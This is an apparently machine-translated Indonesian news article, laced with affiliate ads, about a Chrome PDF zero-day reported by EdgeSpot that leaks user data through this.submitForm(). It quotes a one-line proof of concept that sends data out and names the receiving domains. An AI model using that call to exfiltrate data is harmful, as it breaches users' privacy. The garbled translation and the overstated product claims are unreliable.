- EdgeSpot menemukan kerentanan zero-day yang menarik yang mengeksploitasi dokumen PDF di Chrome.
- Ini kerentanan dapat membahayakan Anda dengan mengambil data sensitif di PC Anda.
- Jelajahi kami Halaman Web & Awan untuk wawasan lebih lanjut tentang alat dan layanan lain.
- Jika Anda tertarik dengan browser, kami menyediakan banyak informasi tentangnya di kami Pusat Peramban.
Jadikan semua dokumen Anda dapat diakses dan aman menggunakan Adobe Acrobat Reader. Alat manajemen dokumen ini juga memungkinkan Anda menandatangani elektronik dan membuat formulir resmi untuk menghemat waktu Anda di tempat kerja. Dapatkan untuk PC Anda dan Anda akan dapat:
- Buka, cetak, dan edit semua PDF Anda dan jenis file lainnya
- Isi formulir PDF lebih mudah
- Simpan dokumen penting Anda terenkripsi
Dapatkan semua aplikasi dengan harga khusus!
Perangkat lunak manajemen dokumen Nr.1 dunia sekarang dengan harga yang mahal, jadi cepatlah!
Eksploitasi layanan deteksi EdgeSpot menemukan hal yang menarik Chrome kerentanan zero-day mengeksploitasi dokumen PDF.
Kerentanan memungkinkan penyerang untuk panen data sensitif menggunakan dokumen PDF berbahaya yang dibuka di Chrome.
Segera setelah korban membuka file PDF masing-masing di Google Chrome, program jahat mulai bekerja di latar belakang dengan mengumpulkan data pengguna.
Data tersebut kemudian diteruskan ke server jarak jauh yang sedang dikendalikan oleh para peretas. Anda mungkin bertanya-tanya data apa yang disedot oleh penyerang, mereka menargetkan data berikut di PC Anda:
- alamat IP
- Jalur lengkap file PDF di sistem
- Versi OS dan Chrome
Waspadalah terhadap file PDF yang sarat malware
Pakar tutul bahwa salah satu dari dua domain readnotify[.]com atau burpcollaborator[.]net sedang menerima data.
Mereka mengungkapkan bahwa penyerang menggunakan are ini.submitForm() PDF Javascript API untuk mengumpulkan informasi sensitif pengguna.
Kami mengujinya dengan PoC minimal, panggilan API sederhana seperti this.submitForm(‘ http://google.com/test’) akan membuat Google Chrome mengirimkan data pribadi ke google.com.
Bug Chrome ini dieksploitasi oleh dua kumpulan file PDF berbahaya yang berbeda, keduanya diedarkan masing-masing pada Oktober 2017 dan September 2018.
Khususnya, data yang dikumpulkan dapat digunakan oleh penyerang untuk menyempurnakan serangan di masa mendatang. Laporan menunjukkan bahwa kumpulan file pertama dikompilasi menggunakan layanan pelacakan PDF ReadNotify.
Pengguna dapat memanfaatkan layanan untuk melacak pandangan pengguna. EdgeSpot belum membagikan detail apa pun tentang sifat kumpulan file PDF kedua.
Kiat cepat: Ubah browser Anda ke Opera
Di masa sulit ini, kita diserang dengan malware, phishing, dan trojan di setiap langkah sehingga kita harus lebih waspada dan tetap terlindungi.
Dan karena ini adalah masalah khusus untuk Chrome, Anda dapat menghindari ancaman itu dan yang lainnya dengan browser berorientasi keamanan seperti Opera.
Peramban ini dilengkapi dengan pemblokir iklan bawaan yang tidak hanya menghilangkan gangguan tersebut tetapi juga memblokir skrip analitik, piksel pelacakan, dan metode untuk mengumpulkan data Anda.
Dan jika Anda ingin benar-benar yakin bahwa Anda menjauh dari bahaya apa pun, dapatkan di belakang built-in VPN layanan yang 100% gratis untuk digunakan tanpa batas waktu.
Opera
Opera menawarkan perlindungan ancaman yang sempurna dengan pemblokir iklan bawaan dan layanan VPN gratis!
Kunjungi Situs Web
Bagaimana saya bisa tetap terlindungi dari kerentanan PDF?
Unduh Adobe Acrobat PRO
Adobe dan Chrome sangat cocok dalam menangani file PDF. Dengan menginstal Ekstensi Adobe untuk Chrome, Anda dapat meninjau dan memanipulasi PDF sesuai keinginan Anda tanpa meninggalkan browser favorit Anda.
Meskipun strukturnya kuat, malware yang tersembunyi di file PDF mungkin tidak terdeteksi jika Anda menggunakan Reader versi standar.
Versi profesional direkomendasikan untuk menjamin perlindungan Anda dan menjauhkan data Anda dari peretas.
Meskipun tidak gratis, harga yang akan Anda bayarkan agak kecil untuk sejumlah besar fitur tambahan yang akan Anda nikmati termasuk peningkatan keamanan file PDF Anda.
Ada juga uji coba gratis 7 hari yang disertakan sehingga Anda bisa merasakan pengalaman Pro penuh sebelum melakukan pembelian.
Adobe Acrobat PRO
Jauhi malware dengan mengunduh Adobe Acrobat PRO. Ini memiliki lebih banyak fitur daripada versi gratis dan menjaga data Anda tetap aman.
Kunjungi situs web
Jika Anda ingin aman saat berselancar di internet, Anda perlu mendapatkan alat khusus untuk mengamankan jaringan Anda. Instal Akses Internet Pribadi sekarang dan mengamankan diri sendiri. Ini melindungi PC Anda dari serangan saat menjelajah, menutupi alamat IP Anda, dan memblokir semua akses yang tidak diinginkan.
Layanan deteksi Exploit EdgeSpot ingin memperingatkan pengguna Chrome tentang potensi risiko karena patch tersebut diperkirakan tidak akan dirilis dalam waktu dekat.
EdgeSpot melaporkan ke Google tentang kerentanan tahun lalu dan perusahaan berjanji untuk merilis patch akhir April.
Namun, Anda dapat mempertimbangkan untuk menggunakan solusi sementara untuk masalah tersebut dengan melihat dokumen PDF yang diterima secara lokal menggunakan aplikasi pembaca lain.
Atau, Anda juga dapat membuka dokumen PDF di Chrome dengan memutuskan sistem Anda dari Internet.
Pertanyaan yang Sering Diajukan
Ya, memang. Tetapi jika Anda ingin pilihan yang lebih luas, jelajahi pilihan teratas kami untuk Chromepribadi ekstensi di panduan lengkap ini.
Tdi sini ada banyak ekstensi yang memungkinkan PDF pengolahan. Memeriksa keluar dari kami panduan yang sangat baik tentang ekstensi PDF terbaik untuk Chrome.
Tidak, tetapi Anda dapat mengaktifkannya dengan cepat. Inilah kami panduan lengkap tentang cara mengaktifkan pembuat kode QR di Chrome.
![5 alternatif Kotak Bitdefender terbaik [Panduan 2021]](/f/5f88461ee0d2bc820f8a06e3cf4edcf9.jpg?width=300&height=460)
![5+ antivirus gratis terbaik selama satu tahun [Panduan 2021]](/f/fd1a3fa86771a1bae6534cd34d334c16.jpg?width=300&height=460)